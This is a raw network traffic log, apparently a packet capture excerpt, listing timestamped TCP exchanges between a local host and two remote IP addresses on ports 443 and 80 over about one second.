                                                                                                                          Oct 22, 2024 16:11:59.401099920 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401144028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401323080 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401386976 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401420116 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401529074 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401607037 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.401623011 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.401812077 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.406919956 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.408382893 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.408396959 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.408519983 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.417073011 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.417162895 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.417176962 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.418792009 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518182993 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518307924 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518377066 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518491983 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518590927 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518691063 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518779993 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518780947 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.518796921 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518851042 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.518910885 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.523705959 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.523776054 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.523792028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.526799917 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.532618046 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.534303904 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.534322023 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.534809113 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.635077953 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635287046 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635413885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635514021 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.635593891 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.635628939 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.638807058 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.638828039 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.639691114 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.640528917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.640815020 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.640897989 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.640914917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.642796040 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.649734974 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.650799990 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.650815010 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.654797077 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.751791000 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.751944065 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752018929 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752048969 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752079010 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752248049 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752249002 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752327919 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.752386093 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.752403021 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.754793882 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.754807949 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.757886887 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.757951021 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.757966995 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.758789062 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766591072 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.766756058 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.766808987 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766809940 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.766827106 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.770648956 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.770663023 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.770787001 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868716002 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.868855000 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868889093 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.868948936 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.868957996 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869103909 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869119883 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.869139910 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.869155884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.869200945 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.874859095 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.874933958 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.874984980 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.875037909 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883799076 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.883882999 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883915901 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.883968115 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.883980989 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.884023905 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.884037018 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.884082079 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.927548885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.927653074 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985681057 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985779047 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985845089 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985914946 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.985932112 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.985991955 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.986005068 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.986063957 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.986078024 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.986135960 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.991997957 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992063999 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992120028 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992177010 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992214918 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992275953 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992314100 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992357016 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.992407084 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.992459059 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.000971079 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001100063 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001117945 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001182079 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001194954 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001252890 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.001272917 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.001353979 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.021541119 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.026900053 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.026966095 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.027342081 CEST4999080192.168.2.6193.122.6.168
                                                                                                                          Oct 22, 2024 16:12:00.033148050 CEST8049990193.122.6.168192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.044452906 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.044550896 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.102828979 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.102933884 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.103001118 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.103065968 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.103631973 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.103688955 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.103745937 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.103800058 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.109154940 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.109219074 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.109256983 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.109321117 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.117980003 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118050098 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.118099928 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118169069 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.118194103 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118249893 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.118288994 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118345022 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.118571997 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118628025 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.118834019 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.118900061 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.207525969 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.207587004 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.219408035 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.219461918 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.219476938 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.219527960 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.219532967 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.219568968 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.219882011 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.219928026 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.219943047 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.219984055 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.225862026 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.225938082 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.225945950 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.225987911 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.234913111 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.234957933 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.234966993 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235018969 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.235064983 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235100985 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.235106945 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235143900 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.235625029 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235668898 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.235673904 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235707045 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.235712051 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.235754013 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360316992 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360390902 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360470057 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360517979 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360563993 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360729933 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360738039 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360763073 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360805035 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360836029 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360857964 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.360913992 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.360953093 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361007929 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361062050 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361114979 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361149073 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361206055 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361464024 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361516953 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361557007 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361612082 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361650944 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361701965 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.361741066 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.361792088 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.362330914 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.362385988 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.363092899 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.363152981 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.396542072 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.396653891 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477010012 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477075100 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477078915 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477094889 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477121115 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477155924 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477314949 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477363110 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477372885 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477416992 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.477421999 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.477459908 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478044033 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478092909 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478096008 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478107929 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478149891 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478153944 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478212118 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478745937 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478796959 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478802919 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478846073 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478857994 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478909016 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.478912115 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.478959084 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.556930065 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.556991100 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594296932 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594357014 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594527960 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594571114 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594582081 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594623089 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594628096 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594670057 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594671965 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594688892 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594705105 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594731092 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594734907 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594770908 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594774961 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594810963 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594814062 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594830036 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594846010 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594866991 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.594871044 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.594904900 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.595474958 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.595525026 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.595537901 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.595576048 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.595649004 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.595693111 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.595698118 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.595737934 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.595741987 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.595781088 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.711559057 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.711618900 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.711724997 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.711771011 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.711817026 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.711862087 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.711905956 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.711947918 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712004900 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712047100 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712114096 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712152958 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712213039 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712253094 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712311983 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712352037 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712399006 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712443113 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712496042 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712534904 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:12:00.712605000 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:12:00.712647915 CEST49989443192.168.2.6142.250.185.65
